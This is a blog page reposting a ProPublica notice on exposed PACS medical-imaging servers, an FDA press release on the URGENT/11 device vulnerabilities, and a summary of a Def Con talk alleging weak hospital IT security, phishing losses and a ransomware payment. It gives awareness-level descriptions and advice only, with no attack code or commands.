If you have had a medical imaging scan (e.g., X-ray, CT scan, MRI, ultrasound, etc.) ask the health care provider that did the scan - or your doctor - if access to your images requires a login and password. Ask your doctor if their office or the medical imaging provider to which they refer patients conducts a regular security assessment as required by HIPAA.

If you are a medical imaging provider or doctor’s office:

Researchers have found that picture archiving and communication systems (PACS) servers implementing the DICOM standard may be at risk if they are connected directly to the internet without a VPN or firewall, or if access to them does not require a secure password. You or your IT staff should make sure that your PACS server cannot be accessed via the internet without a VPN connection and password. If you know the IP address of your PACS server but are not sure whether it is (or has been) accessible via the internet, please reach out to us at “medicalimaging at propublica.org.”

SOURCE

---

FDA informs patients, providers and manufacturers about potential cybersecurity vulnerabilities for connected medical devices and health care networks that use certain communication software

FDA
October 1, 2019

Today, the U.S. Food and Drug Administration is informing patients, health care professionals, IT staff in health care facilities and manufacturers of a set of cybersecurity vulnerabilities, referred to as URGENT/11,Ӕ thatif exploited by a remote attackerחmay introduce risks for medical devices and hospital networks. URGENT/11 affects several operating systems that may then impact certain medical devices connected to a communications network, such as wi-fi and public or home Internet, as well as other connected equipment such as routers, connected phones and other critical infrastructure equipment. These cybersecurity vulnerabilities may allow a remote user to take control of a medical device and change its function, cause denial of service, or cause information leaks or logical flaws, which may prevent a device from functioning properly or at all.

To date, the FDA has not received any adverse event reports associated with these vulnerabilities. The public was first informed of these vulnerabilities in a July 2019 advisory sent by the Department of Homeland Security. Today, the FDA is providing additional information regarding the source of these vulnerabilities and recommendations for reducing or avoiding risks the vulnerabilities may pose to certain medical devices.

While advanced devices can offer safer, more convenient and timely health care delivery, a medical device connected to a communications network could have cybersecurity vulnerabilities that could be exploited resulting in patient harm,Ӕ said Amy Abernethy, M.D., Ph.D., FDAs principal deputy commissioner. ғThe FDA urges manufacturers everywhere to remain vigilant about their medical productsto monitor and assess cybersecurity vulnerability risks, and to be proactive about disclosing vulnerabilities and mitigations to address them. This is a cornerstone of the FDAגs efforts to work with manufacturers, health care delivery organizations, security researchers, other government agencies and patients to develop and implement solutions to address cybersecurity issues that affect medical devices in order to keep patients safe.

The URGENT/11 vulnerabilities exist in a third-party software, called IPnet, that computers use to communicate with each other over a network. This software is part of several operating systems and may be incorporated into other software applications, equipment and systems. The software may be used in a wide range of medical and industrial devices. Though the IPnet software may no longer be supported by the original software vendor, some manufacturers have a license that allows them to continue to use it without support. Therefore, the software may be incorporated into a variety of medical and industrial devices that are still in use today.

Security researchers, manufacturers and the FDA are aware that the following operating systems are affected, but the vulnerability may not be included in all versions of these operating systems:

VxWorks (by Wind River)
Operating System Embedded (OSE) (by ENEA)
INTEGRITY (by GreenHills)
ThreadX (by Microsoft)
ITRON (by TRON)
ZebOS (by IP Infusion)

The agency is asking manufacturers to work with health care providers to determine which medical devices, either in their health care facility or used by their patients, could be affected by URGENT/11 and develop risk mitigation plans. Patients should talk to their health care providers to determine if their medical device could be affected and to seek help right away if they notice the functionality of their device has changed.

The FDA takes reports of vulnerabilities in medical devices very seriously and todayԒs safety communication includes recommendations to manufacturers for continued monitoring, reporting and remediation of medical device cybersecurity vulnerabilities. The FDA is recommending that manufacturers conduct a risk assessment, as described in the FDAs cybersecurity postmarket guidance, to evaluate the impact of these vulnerabilities on medical devices they manufacture and develop risk mitigation plans. Medical device manufacturers should work with operating system vendors to identify available patches and other recommended mitigation methods, work with health care providers to determine any medical devices that could potentially be affected, and discuss ways to reduce associated risks.

Some medical device manufacturers are already actively assessing which devices may be affected by URGENT/11 and are identifying risk and remediation actions. In addition, several manufacturers have already proactively notified customers of affected products, which include medical devices such as an imaging system, an infusion pump and an anesthesia machine. The FDA expects that additional medical devices with one or more of the cybersecurity vulnerabilities will be identified.

ғWhile we are not aware of patients who may have been harmed by this particular cybersecurity vulnerability, the risk of patient harm if such a vulnerability were left unaddressed could be significant, said Suzanne Schwartz, M.D., MBA, deputy director of the Office of Strategic Partnerships and Technology Innovation in the FDAԒs Center for Devices and Radiological Health. The safety communication issued today contains recommendations for what actions patients, health care providers and manufacturers should take to reduce the risk this vulnerability could pose. ItӒs important for manufacturers to be aware that the nature of these vulnerabilities allows the attack to occur undetected and without user interaction. Because an attack may be interpreted by the device as a normal network communication, it may remain invisible to security measures.

The FDA will continue its work with manufacturers and health care delivery organizationsԗas well as security researchers and other government agenciesto help develop and implement solutions to address cybersecurity issues throughout a device’s total product lifecycle.

The FDA will continue to assess new information concerning the URGENT/11 vulnerabilities and will keep the public informed if significant new information becomes available.

The FDA, an agency within the U.S. Department of Health and Human Services, protects the public health by assuring the safety, effectiveness, and security of human and veterinary drugs, vaccines and other biological products for human use, and medical devices. The agency also is responsible for the safety and security of our nationגs food supply, cosmetics, dietary supplements, products that give off electronic radiation, and for regulating tobacco products.

SOURCE

Posted by Elvis on 09/18/19 •
Section Privacy And Rights • Section Dying America
View (0) comment(s) or add a new one
Printable viewLink to this article
Home

Sunday, August 25, 2019

Defcon Hospital Horror Stories

By Emil Hozan
Serendipity
August 23, 2019

Disclaimer: don’t read this if you don’t want your sense of security involving medical information shattered. This post is based on a Skytalk presented at Def Con 27. The presenter opted to redact their name for privacy concerns. What made this talk quite startling was the fact that the presenter supports over 25 hospitals around the US and has insight of just how poor information systems security is within these hospital environments. Due to the nature of these talks, recordings are prohibited, and I didn’t want to get kicked out, so I avoided taking notes as well just in case. This semi ties into a past post I wrote pertaining to poor MEDICAL DEVICE SECURITY and another follow up post about what the INDUSTRY IS DOING about it.

That said, if you want to learn more about an insiderҒs perspective into the horror stories within the medical industry, read on.

A Barrage of Issues

Hearing all that was said was quite terrifying, from password concerns to the sheer number of internal vulnerabilities detected, I was simply astonished at the words coming from the speaker. What was more than that, however, was UPPER MANAGEMENT’S LACK OF INTEREST in corrective action. Stick with me while I go through the points discussed and what solutions were proposed but not implemented.

For starters, a huge concern was the operating systems in use within the hospitals the speaker supported. He stated that DOS was still being used and he was the only employee on his team who even knew what DOS was. Not to mention the continued use of Windows XP, NT, and 95 now if that doesn’t date a few things, I am not sure what will. These are machines handling personal health information, where critical vulnerabilities are publicized with no available patches or fixes are available for these unsupported systems. Whats even more crazy was a “new robot” that was in charge of provisioning medicine - it, too, ran on DOS!

If you’re curious of release dates, check out this Wikipedia page discussing Windows version and their release dates. On that same note, and one of the most alarming points made, was that on average, his internally ran vulnerability scans results in over 300 critical vulnerabilities! You read that right, yes this is on average.

Next off was poor password practices. From weak passwords just barely satisfying password policies, to doctors openly sharing passwords with staff members, it’s almost as if anyone could access a patients’ health information masked as a doctor. The speaker stated that it wasn’t uncommon for nurses to know the password of at least three doctors they worked with. There were network devices that didn’t even have a password! We all know what can happen with compromised passwords, or even a lack of a password - yikes!

To make matters worse, I forget the password solution used in his supported hospitals, but it was something along the lines of SSGP or similar. What I know is that it was four characters and started with SS. The point is, this speaker was part of a hacker group and this group discovered a vulnerability but opted to not disclose this vulnerability. The speakers dire warning was, all medical staff should change their passwords, immediately!” Think about that for a moment; a password solution with an undisclosed vulnerability I’ll tie these password points in later, keep reading.

Another alarming act was his attempt at personally lockpicking doors protecting secure areas. He mentioned one such incident where two or three people approached him stating, What you’re doing is pretty shady. The speaker replied, “I know, you’re right. What I am doing is shady.” He said that after three hours, no one reported him, nor did security confront him. The speaker was able to break his way into network closets, where equipment was essentially wide open and was able to set up rogue access points, as well as scan the network. Mind you he was doing this in an attempt to check what security measures were in place.

One observation the speaker made was the sheer amount of bacteria and mold growing on this network equipment. He showed pictures he took of Ethernet cables and switches caked with molasses and other icky stuff ewww.

Wow is really all I can say. That was astonishing and to be honest, it was tough to admit and see truth in his alleged statements. However, what made me believe his story more than anything was his interest in his and his father֒s medical conditions. One day he got curious due to the number of hospital visits the two make. When he started poking, he went full throttle to see just how poor security measures are.

Enough Scary Talk, Proposed Solutions

In reading the above section, you should know by now what some proposed solutions would be. Examples include not sharing your password, enabling passwords for that matter, and using currently supported operating systems, as well as ensuring physical security is a thing. If you weren’t thinking of those, now you know.

Past that, and what actually seemed to be a fair solution to avoid a lot of the above: mobile medical units.

The speaker started off by saying mammograms are mobile, and that there should be an effort in mobilizing other critical devices. Get everything mobilized and start treating patients in-house, where they’re most comfortable. That really stuck out to me. There’s always been a notion of making patients most comfortable and the truth is, often times, being at home is whats most comfortable.

I am sure there are more logistics behind that statement, which leads to a desire for expanded conversations on how to go about mobilizing medical staff. It seems semi-feasible, but I also know that there are a lot of varying illnesses and it kind of makes it seem infeasible at the same time. I’m no medical expert so I cant speak too much on this.

Tying in the Loose Ends

Above I left the password talk on a cliff hanger. Allow me to expand in this section.

The speaker stated the number of phishing attempts was simply overwhelming, and that there are many who fall prey. Two examples he gave were more recent: one being where a finance department personnel fell victim to a fraudulent invoice totaling $500,000 (that’s a lot of money), and the other was a critical ransomware attack (which started at $900,000 that the staff was able to work down to $500,000). The latter was facilitated by compromised passwords.

I’m not sure about you but I’ve received many fraudulent invoice requests of varying amounts. It’s easier for me to disregard because I know I am not in the position to handle such matters. The same cannot be said for the one who fell victim though. That said, and with such a large sum of money, employees shouldn’t blindly pay anything without checking the records. There should be a way to validate such invoices and I find it hard to believe there isn’t some sort of paper trail regarding who the hospital does business with and what’s owed to whom. If this isn’t the case, paying an excessive amount of money for an untraceable invoice is an expensive fault that needs correction.

As for the latest ransomware attack- this started Monday, August 5th, the week of Black Hat / DefCon. He got into town that night, went to sleep and was awoken early Tuesday morning with reports of a ransomware attack. Immediately he told the caller to ensure all passwords were changed and what to expect. The backups were too old tsk, tsk 0 so they were left with no choice but to negotiate and pay. The staff did this, yet they failed to change their passwords! After forking out $500k, they were hit again with the same attack Thursday of that same week because they didn’t change their passwords! Imagine that. And to make it worse, the staff agreed to change their password this time. but opted to wait until the following week to do so.

Did they? I am not sure but waiting is such a silly thing to do.

This all leads back to user training. All personnel should be trained on how to look out for phishing emails and other unsolicited emails claiming a lack of payment. The same applies with passwords uses. Reusing passwords is a no-no and with all that was said above, multi-factor authentication would definitely be worth the cost. With these two examples, that’s a fair sum of money paid, and you’d figure that change would be expected.

Conclusion

I would be lying if I said I’d feel comfortable going to a doctor and feeling my personal health information is safe. Obviously when you’re in a critical condition it may not mean as much at that time, your life is on the line after all, but its still a scary thought to know the gravity of just how poor hospital security allegedly is. Further, with the HIPAA violation costs, the speaker stated that hospitals are more prone on not reporting breaches and thus not getting fined. Again, these are all allegations and all I am doing is summarizing what was reported.

Tying in the whole medical device concerns with this development, change is in order. With personal information being publicized on the dark web and accessible by other threat actors, there’s no telling what they may do with that information. There was a lot more that was said in this talk and what I wrote was merely a glimpse. Its difficult to ensure your personal information is safe when you’re not the one responsible for keeping it safe. The truth is, its the doctors’ responsibility along with the medical staff and the IT team of said hospitals.

SOURCE

Posted by Elvis on 08/25/19 •
Section Privacy And Rights
View (0) comment(s) or add a new one
Printable viewLink to this article
Home
Page 1 of 70 pages  1 2 3 >  Last »

Statistics

Total page hits 9629851
Page rendered in 2.3000 seconds
40 queries executed
Debug mode is off
Total Entries: 3217
Total Comments: 337
Most Recent Entry: 03/09/2020 05:27 pm
Most Recent Comment on: 01/02/2016 09:13 pm
Total Logged in members: 0
Total guests: 9
Total anonymous users: 0
The most visitors ever was 172 on 12/25/2019 07:40 am


Email Us

Home

Members:
Login | Register
Resumes | Members

In memory of the layed off workers of AT&T

Today's Diversion

The worst solitude is to be destitute of sincere friendship. - Francis Bacon

Search


Advanced Search

Sections

Calendar

April 2020
S M T W T F S
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30    

Must Read

Most recent entries

RSS Feeds

Today's News

ARS Technica

External Links

Elvis Picks

BLS Pages

Favorites

All Posts

Archives

RSS


Creative Commons License


Support Bloggers' Rights